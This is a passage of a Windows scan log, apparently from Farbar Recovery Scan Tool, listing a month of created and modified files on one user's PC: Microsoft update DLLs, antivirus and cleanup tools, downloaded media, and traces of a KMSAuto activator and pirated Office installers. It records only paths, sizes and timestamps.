2016-03-02 13:25 - 2016-02-23 20:38 - 00895080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfsrcsnk.dll
2016-03-02 13:25 - 2016-02-23 20:38 - 00882720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmp4srcsnk.dll
2016-03-02 13:25 - 2016-02-23 20:38 - 00450912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFCaptureEngine.dll
2016-03-02 13:25 - 2016-02-23 20:38 - 00420928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvproc.dll
2016-03-02 13:25 - 2016-02-23 20:37 - 00713824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmpeg2srcsnk.dll
2016-03-02 13:25 - 2016-02-23 20:32 - 00791744 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2016-03-02 13:25 - 2016-02-23 20:30 - 02919320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-03-02 13:25 - 2016-02-23 20:27 - 00376536 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.MediaControl.dll
2016-03-02 13:25 - 2016-02-23 20:25 - 00534368 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\USBHUB3.SYS
2016-03-02 13:25 - 2016-02-23 20:20 - 01139712 _____ (Microsoft Corporation) C:\Windows\system32\XblGameSave.dll
2016-03-02 13:25 - 2016-02-23 20:20 - 00238592 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\xboxgip.sys
2016-03-02 13:25 - 2016-02-23 20:19 - 00029696 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\xinputhid.sys
2016-03-02 13:25 - 2016-02-23 20:17 - 00649216 _____ (Microsoft Corporation) C:\Windows\system32\ngcsvc.dll
2016-03-02 13:25 - 2016-02-23 20:12 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\provpackageapidll.dll
2016-03-02 13:25 - 2016-02-23 20:10 - 00027648 _____ (Microsoft Corporation) C:\Windows\system32\WiFiConfigSP.dll
2016-03-02 13:25 - 2016-02-23 20:07 - 00037376 _____ (Microsoft Corporation) C:\Windows\system32\LaunchWinApp.exe
2016-03-02 13:25 - 2016-02-23 20:07 - 00026112 _____ (Microsoft Corporation) C:\Windows\system32\wlansvcpal.dll
2016-03-02 13:25 - 2016-02-23 20:06 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\flvprophandler.dll
2016-03-02 13:25 - 2016-02-23 20:01 - 00104960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rasl2tp.sys
2016-03-02 13:25 - 2016-02-23 20:00 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\EnterpriseDesktopAppMgmtCSP.dll
2016-03-02 13:25 - 2016-02-23 20:00 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\wfdprov.dll
2016-03-02 13:25 - 2016-02-23 19:58 - 00052224 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2016-03-02 13:25 - 2016-02-23 19:58 - 00025088 _____ (Microsoft Corporation) C:\Windows\system32\irmon.dll
2016-03-02 13:25 - 2016-02-23 19:57 - 00199168 _____ (Microsoft Corporation) C:\Windows\system32\InstallAgent.exe
2016-03-02 13:25 - 2016-02-23 19:56 - 02186864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d11.dll
2016-03-02 13:25 - 2016-02-23 19:55 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bridge.sys
2016-03-02 13:25 - 2016-02-23 19:53 - 00115712 _____ (Microsoft Corporation) C:\Windows\system32\srpapi.dll
2016-03-02 13:25 - 2016-02-23 19:53 - 00099328 _____ (Microsoft Corporation) C:\Windows\system32\ngckeyenum.dll
2016-03-02 13:25 - 2016-02-23 19:52 - 00087040 _____ (Microsoft Corporation) C:\Windows\system32\MDMAppInstaller.exe
2016-03-02 13:25 - 2016-02-23 19:50 - 00159232 _____ (Microsoft Corporation) C:\Windows\system32\DeviceCensus.exe
2016-03-02 13:25 - 2016-02-23 19:48 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\AppCapture.dll
2016-03-02 13:25 - 2016-02-23 19:48 - 00041984 _____ (Microsoft Corporation) C:\Windows\system32\TimeBrokerClient.dll
2016-03-02 13:25 - 2016-02-23 19:40 - 00074240 _____ (Microsoft Corporation) C:\Windows\system32\SMSRouter.dll
2016-03-02 13:25 - 2016-02-23 19:39 - 00178176 _____ (Microsoft Corporation) C:\Windows\system32\psmsrv.dll
2016-03-02 13:25 - 2016-02-23 19:38 - 00320000 _____ (Microsoft Corporation) C:\Windows\system32\MSFlacDecoder.dll
2016-03-02 13:25 - 2016-02-23 19:38 - 00287712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.MediaControl.dll
2016-03-02 13:25 - 2016-02-23 19:37 - 00617984 _____ (Microsoft Corporation) C:\Windows\system32\StorSvc.dll
2016-03-02 13:25 - 2016-02-23 19:37 - 00274944 _____ (Microsoft Corporation) C:\Windows\system32\DisplayManager.dll
2016-03-02 13:25 - 2016-02-23 19:37 - 00204288 _____ (Microsoft Corporation) C:\Windows\system32\NetSetupSvc.dll
2016-03-02 13:25 - 2016-02-23 19:36 - 00216576 _____ (Microsoft Corporation) C:\Windows\system32\QuickActionsDataModel.dll
2016-03-02 13:25 - 2016-02-23 19:34 - 00305664 _____ (Microsoft Corporation) C:\Windows\system32\wifiprofilessettinghandler.dll
2016-03-02 13:25 - 2016-02-23 19:34 - 00189952 _____ (Microsoft Corporation) C:\Windows\system32\WiFiDisplay.dll
2016-03-02 13:25 - 2016-02-23 19:33 - 00558080 _____ (Microsoft Corporation) C:\Windows\system32\MBMediaManager.dll
2016-03-02 13:25 - 2016-02-23 19:32 - 00414720 _____ (Microsoft Corporation) C:\Windows\system32\bcastdvr.exe
2016-03-02 13:25 - 2016-02-23 19:31 - 00463360 _____ (Microsoft Corporation) C:\Windows\system32\wlansec.dll
2016-03-02 13:25 - 2016-02-23 19:29 - 00591872 _____ (Microsoft Corporation) C:\Windows\system32\SmsRouterSvc.dll
2016-03-02 13:25 - 2016-02-23 19:27 - 00307712 _____ (Microsoft Corporation) C:\Windows\system32\usbmon.dll
2016-03-02 13:25 - 2016-02-23 19:26 - 00372224 _____ (Microsoft Corporation) C:\Windows\system32\MDEServer.exe
2016-03-02 13:25 - 2016-02-23 19:23 - 00412672 _____ (Microsoft Corporation) C:\Windows\system32\wlanmsm.dll
2016-03-02 13:25 - 2016-02-23 19:22 - 00567808 _____ (Microsoft Corporation) C:\Windows\system32\MCRecvSrc.dll
2016-03-02 13:25 - 2016-02-23 19:20 - 00847360 _____ (Microsoft Corporation) C:\Windows\system32\netlogon.dll
2016-03-02 13:25 - 2016-02-23 19:20 - 00606720 _____ (Microsoft Corporation) C:\Windows\system32\wcmsvc.dll
2016-03-02 13:25 - 2016-02-23 19:20 - 00493568 _____ (Microsoft Corporation) C:\Windows\system32\mfmkvsrcsnk.dll
2016-03-02 13:25 - 2016-02-23 19:20 - 00330240 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2016-03-02 13:25 - 2016-02-23 19:19 - 00948736 _____ (Microsoft Corporation) C:\Windows\system32\XblAuthManager.dll
2016-03-02 13:25 - 2016-02-23 19:19 - 00517632 _____ (Microsoft Corporation) C:\Windows\system32\winspool.drv
2016-03-02 13:25 - 2016-02-23 19:18 - 00557056 _____ (Microsoft Corporation) C:\Windows\system32\PsmServiceExtHost.dll
2016-03-02 13:25 - 2016-02-23 19:14 - 00828928 _____ (Microsoft Corporation) C:\Windows\system32\Windows.AccountsControl.dll
2016-03-02 13:25 - 2016-02-23 19:14 - 00029696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\LaunchWinApp.exe
2016-03-02 13:25 - 2016-02-23 19:12 - 00852480 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.Store.dll
2016-03-02 13:25 - 2016-02-23 19:11 - 00587776 _____ (Microsoft Corporation) C:\Windows\system32\bisrv.dll
2016-03-02 13:25 - 2016-02-23 19:10 - 00997376 _____ (Microsoft Corporation) C:\Windows\system32\schedsvc.dll
2016-03-02 13:25 - 2016-02-23 19:10 - 00474624 _____ (Microsoft Corporation) C:\Windows\system32\NetSetupShim.dll
2016-03-02 13:25 - 2016-02-23 19:09 - 00988160 _____ (Microsoft Corporation) C:\Windows\system32\SharedStartModel.dll
2016-03-02 13:25 - 2016-02-23 19:09 - 00870400 _____ (Microsoft Corporation) C:\Windows\system32\modernexecserver.dll
2016-03-02 13:25 - 2016-02-23 19:06 - 01213440 _____ (Microsoft Corporation) C:\Windows\system32\wwansvc.dll
2016-03-02 13:25 - 2016-02-23 19:05 - 00161280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InstallAgent.exe
2016-03-02 13:25 - 2016-02-23 19:04 - 01131520 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Audio.dll
2016-03-02 13:25 - 2016-02-23 19:04 - 00673792 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.dll
2016-03-02 13:25 - 2016-02-23 19:04 - 00382464 _____ (Microsoft Corporation) C:\Windows\system32\wuuhext.dll
2016-03-02 13:25 - 2016-02-23 19:02 - 01318912 _____ (Microsoft Corporation) C:\Windows\system32\wifinetworkmanager.dll
2016-03-02 13:25 - 2016-02-23 19:02 - 00755712 _____ (Microsoft Corporation) C:\Windows\system32\spoolsv.exe
2016-03-02 13:25 - 2016-02-23 19:02 - 00285696 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2016-03-02 13:25 - 2016-02-23 18:58 - 00175616 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Core.TextInput.dll
2016-03-02 13:25 - 2016-02-23 18:58 - 00163840 _____ (Microsoft Corporation) C:\Windows\system32\TimeBrokerServer.dll
2016-03-02 13:25 - 2016-02-23 18:58 - 00108544 _____ (Microsoft Corporation) C:\Windows\system32\InputLocaleManager.dll
2016-03-02 13:25 - 2016-02-23 18:57 - 00031744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TimeBrokerClient.dll
2016-03-02 13:25 - 2016-02-23 18:52 - 00456704 _____ (Microsoft Corporation) C:\Windows\system32\ipnathlp.dll
2016-03-02 13:25 - 2016-02-23 18:50 - 00266752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSFlacDecoder.dll
2016-03-02 13:25 - 2016-02-23 18:49 - 00200704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DisplayManager.dll
2016-03-02 13:25 - 2016-02-23 18:48 - 00838144 _____ (Microsoft Corporation) C:\Windows\system32\uDWM.dll
2016-03-02 13:25 - 2016-02-23 18:47 - 00157184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WiFiDisplay.dll
2016-03-02 13:25 - 2016-02-23 18:38 - 00480256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MCRecvSrc.dll
2016-03-02 13:25 - 2016-02-23 18:37 - 01118208 _____ (Microsoft Corporation) C:\Windows\system32\localspl.dll
2016-03-02 13:25 - 2016-02-23 18:37 - 00613376 _____ (Microsoft Corporation) C:\Windows\system32\SettingSync.dll
2016-03-02 13:25 - 2016-02-23 18:36 - 00713728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netlogon.dll
2016-03-02 13:25 - 2016-02-23 18:36 - 00379392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmkvsrcsnk.dll
2016-03-02 13:25 - 2016-02-23 18:36 - 00250880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2016-03-02 13:25 - 2016-02-23 18:35 - 00400896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winspool.drv
2016-03-02 13:25 - 2016-02-23 18:31 - 00585216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.AccountsControl.dll
2016-03-02 13:25 - 2016-02-23 18:30 - 00646656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Store.dll
2016-03-02 13:25 - 2016-02-23 18:29 - 00349696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NetSetupShim.dll
2016-03-02 13:25 - 2016-02-23 18:28 - 00555520 _____ (Microsoft Corporation) C:\Windows\system32\SyncController.dll
2016-03-02 13:25 - 2016-02-23 18:28 - 00256512 _____ (Microsoft Corporation) C:\Windows\system32\accountaccessor.dll
2016-03-02 13:25 - 2016-02-23 18:24 - 04827136 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll
2016-03-02 13:25 - 2016-02-23 18:24 - 01105920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Audio.dll
2016-03-02 13:25 - 2016-02-23 18:24 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.dll
2016-03-02 13:25 - 2016-02-23 18:21 - 00133632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Core.TextInput.dll
2016-03-02 13:25 - 2016-02-23 18:20 - 00083456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InputLocaleManager.dll
2016-03-02 13:25 - 2016-02-23 18:17 - 02635264 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Logon.dll
2016-03-02 13:25 - 2016-02-23 18:14 - 00990720 _____ (Microsoft Corporation) C:\Windows\system32\SettingSyncCore.dll
2016-03-02 13:25 - 2016-02-23 18:11 - 01390080 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Shell.dll
2016-03-02 13:25 - 2016-02-23 18:05 - 00503296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SettingSync.dll
2016-03-02 13:25 - 2016-02-23 18:01 - 02295808 _____ (Microsoft Corporation) C:\Windows\system32\wlansvc.dll
2016-03-02 13:25 - 2016-02-23 17:58 - 00450560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SyncController.dll
2016-03-02 13:25 - 2016-02-23 17:56 - 04412928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExplorerFrame.dll
2016-03-02 13:25 - 2016-02-23 17:53 - 01799168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Logon.dll
2016-03-02 13:25 - 2016-02-23 17:51 - 00754176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SettingSyncCore.dll
2016-03-02 13:25 - 2016-02-23 17:42 - 03425792 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.dll
2016-03-02 13:25 - 2016-02-23 17:41 - 02912256 _____ (Microsoft Corporation) C:\Windows\system32\CertEnroll.dll
2016-03-02 13:25 - 2016-02-23 17:39 - 02581504 _____ (Microsoft Corporation) C:\Windows\system32\MFMediaEngine.dll
2016-03-02 13:25 - 2016-02-23 17:35 - 07533568 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2016-03-02 13:25 - 2016-02-23 17:33 - 02604032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CertEnroll.dll
2016-03-02 13:25 - 2016-02-23 17:32 - 02793472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.dll
2016-03-02 13:25 - 2016-02-23 17:30 - 02061312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFMediaEngine.dll
2016-03-02 13:25 - 2016-02-23 17:28 - 06740992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2016-03-02 13:25 - 2016-02-09 15:28 - 00277856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\sdbus.sys
2016-03-02 13:25 - 2016-02-09 15:13 - 00185184 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dumpsd.sys
2016-03-02 13:25 - 2016-02-09 14:18 - 00297472 _____ (Microsoft Corporation) C:\Windows\system32\thumbcache.dll
2016-03-02 13:25 - 2016-02-09 14:18 - 00237056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\thumbcache.dll
2016-03-02 13:25 - 2016-02-09 14:07 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\DeviceEnroller.exe
2016-03-01 19:03 - 2016-03-01 20:20 - 890443799 ____R C:\Users\kevin\Downloads\Crouching.Tiger.Hidden.Dragon.Sword.of.Destiny.2016.720p.HDRiP.850MB.ShAaNiG.mkv
2016-03-01 19:02 - 2016-03-01 20:11 - 00000000 ____D C:\Users\kevin\Downloads\Spotlight 2015 1080p BluRay x264 DTS-JYK
2016-03-01 17:18 - 2016-03-08 14:09 - 00000000 ____D C:\ProgramData\KMSAutoS
2016-03-01 17:18 - 2016-03-01 17:18 - 00003786 _____ C:\Windows\System32\Tasks\KMSAutoNet
2016-03-01 17:17 - 2016-03-01 17:19 - 00000000 ____D C:\Users\kevin\AppData\Local\MSfree Inc
2016-03-01 12:58 - 2016-03-01 12:58 - 00002534 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneDrive for Business.lnk
2016-03-01 12:58 - 2016-03-01 12:58 - 00002498 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype for Business 2016.lnk
2016-03-01 12:58 - 2016-03-01 12:58 - 00002493 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word 2016.lnk
2016-03-01 12:58 - 2016-03-01 12:58 - 00002492 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint 2016.lnk
2016-03-01 12:58 - 2016-03-01 12:58 - 00002456 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access 2016.lnk
2016-03-01 12:58 - 2016-03-01 12:58 - 00002455 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel 2016.lnk
2016-03-01 12:58 - 2016-03-01 12:58 - 00002449 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook 2016.lnk
2016-03-01 12:58 - 2016-03-01 12:58 - 00002443 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Publisher 2016.lnk
2016-03-01 12:58 - 2016-03-01 12:58 - 00002435 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote 2016.lnk
2016-03-01 12:58 - 2016-03-01 12:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools
2016-03-01 12:56 - 2016-03-02 12:03 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2016-03-01 12:56 - 2016-03-01 12:56 - 00000000 ____D C:\Users\kevin\AppData\Roaming\WinRAR
2016-03-01 12:56 - 2016-03-01 12:56 - 00000000 ____D C:\Users\kevin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2016-03-01 12:56 - 2016-03-01 12:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2016-03-01 12:56 - 2016-03-01 12:56 - 00000000 ____D C:\Program Files\WinRAR
2016-03-01 12:56 - 2016-03-01 12:56 - 00000000 ____D C:\Program Files\Microsoft Office 15
2016-03-01 12:55 - 2016-03-01 12:56 - 01992496 _____ C:\Users\kevin\Downloads\winrar-x64-531.exe
2016-03-01 12:40 - 2016-03-01 12:43 - 00000000 ____D C:\Users\kevin\Downloads\MICROSOFT Office PRO Plus 2016 v16.0.4266.1003 RTM + Activator [TechTools.NET]
2016-03-01 12:38 - 2016-03-01 12:38 - 00164123 _____ C:\Users\kevin\Downloads\Resume[Kevin_Li].pdf
2016-03-01 12:03 - 2016-03-01 12:03 - 00024333 _____ C:\Users\kevin\Downloads\TPPN-104.torrent
2016-02-24 20:05 - 2016-03-08 16:35 - 00000000 ____D C:\Program Files (x86)\SpeedFan
2016-02-24 20:05 - 2016-02-24 20:05 - 02218504 _____ C:\Users\kevin\Downloads\instspeedfan451.exe
2016-02-24 20:05 - 2016-02-24 20:05 - 00001080 _____ C:\Users\kevin\Desktop\SpeedFan.lnk
2016-02-24 20:05 - 2016-02-24 20:05 - 00000045 _____ C:\Windows\SysWOW64\initdebug.nfo
2016-02-24 20:05 - 2016-02-24 20:05 - 00000000 ____D C:\Users\kevin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpeedFan
2016-02-24 19:54 - 2016-03-03 16:48 - 00000000 ____D C:\Users\kevin\AppData\Roaming\Avira
2016-02-24 19:53 - 2016-02-17 08:41 - 00146704 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avipbb.sys
2016-02-24 19:53 - 2016-02-17 08:41 - 00135880 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avgntflt.sys
2016-02-24 19:53 - 2016-02-17 08:41 - 00073032 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avnetflt.sys
2016-02-24 19:53 - 2016-02-17 08:41 - 00035488 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avkmgr.sys
2016-02-24 19:50 - 2016-02-24 19:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2016-02-24 19:50 - 2016-02-24 19:53 - 00000000 ____D C:\ProgramData\Avira
2016-02-24 19:50 - 2016-02-24 19:53 - 00000000 ____D C:\Program Files (x86)\Avira
2016-02-24 19:50 - 2016-02-24 19:50 - 05404312 _____ (Avira Operations GmbH & Co. KG) C:\Users\kevin\Downloads\avira_en_av_56cd6eb2098ca__ws.exe
2016-02-24 19:50 - 2016-02-24 19:50 - 00001283 _____ C:\Users\Public\Desktop\Avira Launcher.lnk
2016-02-23 23:41 - 2016-02-23 23:42 - 00262326 _____ C:\TDSSKiller.3.1.0.9_23.02.2016_23.41.45_log.txt
2016-02-23 23:41 - 2016-02-23 23:41 - 04727984 _____ (Kaspersky Lab ZAO) C:\Users\kevin\Downloads\tdsskiller.exe
2016-02-23 23:39 - 2016-02-23 23:41 - 05658013 _____ (Swearware) C:\Users\kevin\Downloads\ComboFix.exe
2016-02-23 23:39 - 2016-02-23 23:40 - 02032072 _____ (Bleeping Computer, LLC) C:\Users\kevin\Downloads\rkill.exe
2016-02-23 23:38 - 2016-02-23 23:38 - 00000000 ____D C:\Users\kevin\Downloads\backups
2016-02-23 23:35 - 2016-02-23 23:35 - 00000000 ____D C:\Users\kevin\AppData\Roaming\AVG
2016-02-23 23:34 - 2016-02-24 13:49 - 00000000 ____D C:\Windows\Minidump
2016-02-23 23:33 - 2016-02-23 23:33 - 00000000 ____D C:\Users\kevin\AppData\Roaming\TuneUp Software
2016-02-23 23:29 - 2016-03-03 16:47 - 00000000 ____D C:\ProgramData\MFAData
2016-02-23 23:29 - 2016-02-23 23:29 - 01511936 _____ C:\Users\kevin\Downloads\AdwCleaner.exe
2016-02-23 23:29 - 2016-02-23 23:29 - 00000000 ____D C:\Users\kevin\AppData\Local\MFAData
2016-02-23 23:28 - 2016-03-03 16:47 - 00000000 ____D C:\ProgramData\Avg
2016-02-23 23:28 - 2016-02-24 19:50 - 00000000 ____D C:\Program Files (x86)\AVG
2016-02-23 23:27 - 2016-02-24 19:50 - 00000000 ____D C:\Users\kevin\AppData\Local\AvgSetupLog
2016-02-23 23:27 - 2016-02-23 23:31 - 00000000 ____D C:\Users\kevin\AppData\Local\Avg
2016-02-23 23:27 - 2016-02-23 23:27 - 02979296 _____ (AVG Technologies CZ, s.r.o.) C:\Users\kevin\Downloads\AVG_Protection_Free_1025.exe
2016-02-23 23:21 - 2016-02-23 23:21 - 00000000 ____D C:\Windows\system32\appmgmt
2016-02-23 23:08 - 2016-02-23 23:09 - 00000000 ____D C:\Users\kevin\Downloads\Sherlock.S03.720p.BluRay.x264.ShAaNiG
2016-02-23 23:07 - 2016-02-23 23:33 - 00000000 ____D C:\Users\kevin\Downloads\The.Walking.Dead.S06E10.PROPER.720p.HDTV.x264-KILLERS[ettv]
2016-02-23 23:00 - 2016-02-23 23:00 - 00001406 _____ C:\Windows\SysWOW64\soft.exe
2016-02-21 20:11 - 2016-02-21 20:44 - 544641959 _____ C:\Users\kevin\Downloads\TWD S06E09-No Way Out (2016) 720p HDTV x264 AAC Cknz (Eng Subs).mkv
2016-02-21 12:20 - 2016-02-21 12:20 - 00003882 _____ C:\Windows\System32\Tasks\{8D2053D8-20E4-3EA4-F40B-3B75A24CA541}
2016-02-21 12:20 - 2016-02-21 12:20 - 00000000 ____D C:\Users\kevin\AppData\Roaming\NVIDIA
2016-02-17 20:19 - 2016-02-17 20:22 - 00000000 ____D C:\Users\kevin\AppData\Roaming\DAEMON Tools Lite
2016-02-17 20:19 - 2016-02-17 20:19 - 00047672 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtliteusbbus.sys
2016-02-17 20:19 - 2016-02-17 20:19 - 00030264 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtlitescsibus.sys
2016-02-17 20:19 - 2016-02-17 20:19 - 00000000 ____D C:\Users\Public\Documents\Daemon Tools Images
2016-02-17 20:19 - 2016-02-17 20:19 - 00000000 ____D C:\Users\kevin\AppData\Local\Disc_Soft_Ltd
2016-02-17 20:18 - 2016-02-17 20:18 - 00000000 ____D C:\ProgramData\DAEMON Tools Lite
2016-02-17 20:17 - 2016-02-17 20:17 - 01203634 _____ ( ) C:\Windows\SysWOW64\lnsecsl.exe
2016-02-17 20:15 - 2016-02-17 02:25 - 00000001 _____ C:\Users\kevin\AppData\Roaming\write 1234
2016-02-16 21:51 - 2016-02-16 21:51 - 00000000 ____D C:\Users\kevin\Downloads\Microsoft Office 2013 Professional Plus.(Full)
2016-02-16 20:46 - 2016-02-16 20:46 - 02437120 _____ C:\Users\kevin\Downloads\Copy of TAX-Critical-File.xls
2016-02-14 18:39 - 2016-02-14 18:46 - 00000000 ____D C:\Users\kevin\Downloads\Sicario 2015 1080p BluRay x264 AC3-JYK
2016-02-14 18:39 - 2016-02-14 18:44 - 00000000 ____D C:\Users\kevin\Downloads\Bridge of Spies 2015 1080p BluRay x264 DTS-JYK
2016-02-10 17:16 - 2016-01-29 17:57 - 04502352 _____ (Microsoft Corporation) C:\Windows\explorer.exe
2016-02-10 17:16 - 2016-01-29 17:33 - 04064320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
2016-02-10 17:16 - 2016-01-27 16:59 - 00304752 _____ (Microsoft Corporation) C:\Windows\system32\systemreset.exe
2016-02-10 17:16 - 2016-01-27 16:57 - 01824264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\combase.dll
2016-02-10 17:16 - 2016-01-27 16:57 - 00820704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WinTypes.dll
2016-02-10 17:16 - 2016-01-27 16:55 - 00081112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\OpenWith.exe
2016-02-10 17:16 - 2016-01-27 16:46 - 02606824 _____ (Microsoft Corporation) C:\Windows\system32\combase.dll
2016-02-10 17:16 - 2016-01-27 16:46 - 01270072 _____ (Microsoft Corporation) C:\Windows\system32\WinTypes.dll
2016-02-10 17:16 - 2016-01-27 16:44 - 00604928 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2016-02-10 17:16 - 2016-01-27 16:44 - 00085320 _____ (Microsoft Corporation) C:\Windows\system32\OpenWith.exe
2016-02-10 17:16 - 2016-01-27 16:21 - 00162816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msorcl32.dll
2016-02-10 17:16 - 2016-01-27 16:15 - 00031232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ztrace_maps.dll
2016-02-10 17:16 - 2016-01-27 16:11 - 00118272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mtxoci.dll
2016-02-10 17:16 - 2016-01-27 16:10 - 00099840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\hlink.dll
2016-02-10 17:16 - 2016-01-27 16:08 - 00299008 _____ (Microsoft Corporation) C:\Windows\system32\microsoft-windows-system-events.dll
2016-02-10 17:16 - 2016-01-27 16:08 - 00036864 _____ (Microsoft Corporation) C:\Windows\system32\ztrace_maps.dll
2016-02-10 17:16 - 2016-01-27 16:07 - 00203264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iassam.dll
2016-02-10 17:16 - 2016-01-27 16:04 - 00147456 _____ (Microsoft Corporation) C:\Windows\system32\mtxoci.dll
2016-02-10 17:16 - 2016-01-27 16:02 - 00109056 _____ (Microsoft Corporation) C:\Windows\system32\hlink.dll
2016-02-10 17:16 - 2016-01-27 16:01 - 00792064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-02-10 17:16 - 2016-01-27 15:59 - 00258048 _____ (Microsoft Corporation) C:\Windows\system32\iassam.dll
2016-02-10 17:16 - 2016-01-27 15:52 - 00970752 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-02-10 17:16 - 2016-01-27 15:50 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
2016-02-10 17:16 - 2016-01-27 15:44 - 00063488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cfgbkend.dll
2016-02-10 17:16 - 2016-01-27 15:42 - 01387520 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2016-02-10 17:16 - 2016-01-27 15:32 - 01087488 _____ (Microsoft Corporation) C:\Windows\system32\reseteng.dll
2016-02-10 17:16 - 2016-01-27 15:31 - 00079360 _____ (Microsoft Corporation) C:\Windows\system32\cfgbkend.dll
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-03-09 15:04 - 2016-01-05 10:36 - 00000000 ____D C:\Users\kevin\AppData\Roaming\Spotify
2016-03-09 15:04 - 2016-01-05 10:36 - 00000000 ____D C:\Users\kevin\AppData\Local\Spotify
2016-03-09 15:03 - 2016-01-10 22:34 - 00000934 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
